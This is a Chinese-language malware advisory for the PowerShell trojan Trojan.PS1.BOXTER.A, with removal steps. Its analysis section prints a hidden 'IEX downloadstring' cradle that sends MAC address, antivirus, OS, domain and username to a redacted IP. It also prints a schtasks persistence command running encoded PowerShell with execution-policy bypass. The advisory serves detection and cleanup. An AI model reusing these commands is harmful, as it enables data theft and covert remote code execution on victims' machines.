分(fēn)析者: Alyssa Christelle Ramos   

 平台:

Windows

 总體(tǐ)风险等级:
 潜在破坏:
 潜在分(fēn)布:
 感染次数:
 信息暴露:

  • 恶意软件类型:
    Trojan

  • 有(yǒu)破坏性?:
    没有(yǒu)

  • 加密?:
    没有(yǒu)

  • In the Wild:
    是的

  概要

感染途徑: 从互联网上下载

它以其他(tā)恶意软件释放的文(wén)件或用(yòng)户访问恶意网站时不知不觉下载的文(wén)件的形式到达系统。它开始执行然后再删除。

  技(jì )术详细信息

文(wén)件大小(xiǎo): 2,323 bytes
报告日期: PS1
内存驻留: 没有(yǒu)
初始樣本接收日期: 2021年3月10日
Payload: 连接到 URL/Ip

新(xīn)病毒详细信息

它以文(wén)件的形式出现在系统中(zhōng),可(kě)能(néng)是其他(tā)恶意软件投放的,或者是用(yòng)户在访问恶意网站时无意中(zhōng)下载的。

安(ān)装(zhuāng)

它添加下列进程:

  • %System%\getmac.exe /FO CSV

(注意: %System% 是 Windows 的 system 文(wén)件夹,通常位于 C:\Windows\System (Windows 98 和 ME)、C:\WINNT\System32 (Windows NT 和 2000) 和 C:\WINDOWS\system32 (Windows 2000(32-bit)、XP、Server 2003(32-bit)、Vista、7、8、8.1、2008(64-bit),2012(64bit) 和 10(64-bit))。)

植入例程

它植入下列文(wén)件:

  • %User Temp%\ccc.log
  • %User Temp%\kkkk.log

(注意: %User Temp% 是当前用(yòng)户的 Temp 文(wén)件夹。通常位于 C:\Documents and Settings\{user name}\Local Settings\Temp (Windows 2000(32-bit)、XP 和 Server 2003(32-bit))、C:\Users\{user name}\AppData\Local\Temp (Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit) 和 10(64-bit)。)

信息窃取

它收集下列数据:

  • Mac Address
  • installed AV
  • OS Version
  • OS architecture
  • Domain
  • Username
  • Date

其他(tā)详细信息

该程序执行以下操作(zuò):

  • If Administrator role:
    • It connects to the following URL to download component loaded in its memory:
      • http://cdn.{BLOCKED}dn.net/p?hig{Date}
    • Creates scheduled task:
      • Task Name: Winnet
      • Trigger: Every 45 minutes
      • Task Action: powershell -ep bypass -e {downloaded b64 encoded} /F
    • Adds the following process to create a scheduled task:
      • schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {downloaded b64 encoded}" /F
  • If not Administrator role:
    • It connects to the following URL to download component loaded in its memory:
      • http://cdn.{BLOCKED}dn.net/p?low{Date}
    • Creates scheduled task:
      • Task Name: Winnet
      • Trigger: Every 45 minutes
      • Task Action: powershell -ep bypass -e {downloaded b64 encoded} /F
    • Adds the following process to create a scheduled task:
      • schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {downloaded b64 encoded}" /F
  • If %UserTemp\%kkkk.log does not exists, it creates the file and terminates powershell processes running on the machine
  • It adds the following process if no other instance of the program is running on the machine:
    • /c powershell -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).downloadstring("http://{BLOCKED}.{BLOCKED}.103.152/updatev1?mac={mac address}av={av}version={OS version}bit={OS architecture}flag2={flag}domain={domain}user={username}PS={exeflag}

  解决方案

最小(xiǎo)扫描引擎: 9.800
First VSAPI Pattern File: 16.586.02
VSAPI 第一样式发布日期: 2021年3月10日
VSAPI OPR样式版本: 16.587.00
VSAPI OPR样式发布日期: 2021年3月11日

Step 1

对于Windows ME和XP用(yòng)户,在扫描前,请确认已禁用(yòng)系统还原功能(néng),才可(kě)全面扫描计算机。

Step 2

请注意,在执行此恶意软件/间谍软件/灰色软件期间,并非所有(yǒu)文(wén)件、文(wén)件夹、注册表项和条目都安(ān)装(zhuāng)在您的计算机上。这可(kě)能(néng)是由于安(ān)装(zhuāng)不完整或其他(tā)操作(zuò)系统条件造成的。如果找不到相同的文(wén)件/文(wén)件夹/注册表信息,请继续下一步。

Step 3

搜索和删除这些文(wén)件

[ 更多(duō) ]
有(yǒu)些组件文(wén)件可(kě)能(néng)是隐藏的。请确认在"高级选项"中(zhōng)已选中(zhōng)搜索隐藏文(wén)件和文(wén)件夹复选框,使查找结果包括所有(yǒu)隐藏文(wén)件和文(wén)件夹。  
  • %User Temp%\ccc.log
  • %User Temp%\kkkk.log
DATA_GENERIC_FILENAME_1
  • 查找范围下拉列表中(zhōng),选择
  • 我的電(diàn)脑然后回車(chē)确认。
  • 一旦找到,请选择文(wén)件,然后按下SHIFT+DELETE彻底删除文(wén)件。
  • 对剩余的文(wén)件重复第2到4步:
       
      • %User Temp%\ccc.log
      • %User Temp%\kkkk.log
  • Step 4

    Deleting Scheduled Tasks

    The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

    • Task Name: Winnet
    • Task to be run: powershell -ep bypass -e {downloaded b64 encoded}

    For Windows 2000, Windows XP, and Windows Server 2003:

    1. Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
      System Tools>Scheduled Tasks.
    2. Locate each {Task Name} values listed above in the Name column.
    3. Right-click on the said file(s) with the aforementioned value.
    4. Click on Properties. In the Run field, check for the listed {Task to be run}.
    5. If the strings match the list above, delete the task.

    For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

    1. Open the Windows Task Scheduler. To do this:
      • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
      • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
    2. In the left panel, click Task Scheduler Library.
    3. In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
    4. In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
    5. If the said string is found, delete the task.

    Step 5

    使用(yòng)亚信安(ān)全产(chǎn)品扫描计算机,并删除检测到的Trojan.PS1.BOXTER.A文(wén)件 如果检测到的文(wén)件已被亚信安(ān)全产(chǎn)品清除、删除或隔离,则无需采取进一步措施。可(kě)以选择直接删除隔离的文(wén)件。请参阅知识库页(yè)面了解详细信息。